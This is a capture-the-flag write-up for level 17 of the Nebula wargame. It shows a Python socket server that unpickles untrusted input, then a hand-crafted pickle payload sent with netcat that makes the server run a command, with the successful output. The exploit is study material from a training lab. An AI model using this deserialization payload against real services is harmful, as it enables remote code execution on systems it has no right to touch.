Level17 dictates, “There is a python script listening on port 10007 that contains a vulnerability.”

Python! Nice. The nebula war game is using a variety of languages, which is fantastic. We are provided with the following source code:

    #!/usr/bin/python

    import os
    import pickle
    import time
    import socket
    import signal

    signal.signal(signal.SIGCHLD, signal.SIG_IGN)

    def server(skt):
      line = skt.recv(1024)

      obj = pickle.loads(line)

      for i in obj:
          clnt.send("why did you send me " + i + "?\n")

    skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
    skt.bind(('0.0.0.0', 10007))
    skt.listen(10)

    while True:
      clnt, addr = skt.accept()

      if(os.fork() == 0):
          clnt.send("Accepted connection from %s:%d" % (addr[0], addr[1]))
          server(clnt)
          exit(1)

I won’t spoil it, but I learned about pickle over at pythonchallenge.com. Do some additional research if you are not familiar with it.

The majority of the information on pickle will present you with this warning:

    Warning The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Never trust the user :)

Let’s craft some malicious data:

    level17@nebula:~$ cat foo
    cos
    system
    (S'getflag > /home/flag17/output'
    tR.

This data, when deserialized, instructs the system to run ‘getflag > /home/flag17/output’. Let’s direct it at the listener using netcat.

    level17@nebula:~$ nc localhost 10007 < foo
    Accepted connection from 127.0.0.1:44614^C
    level17@nebula:~$ cat /home/flag17/output
    You have successfully executed getflag on a target account

Woo, on to the next level!

Mike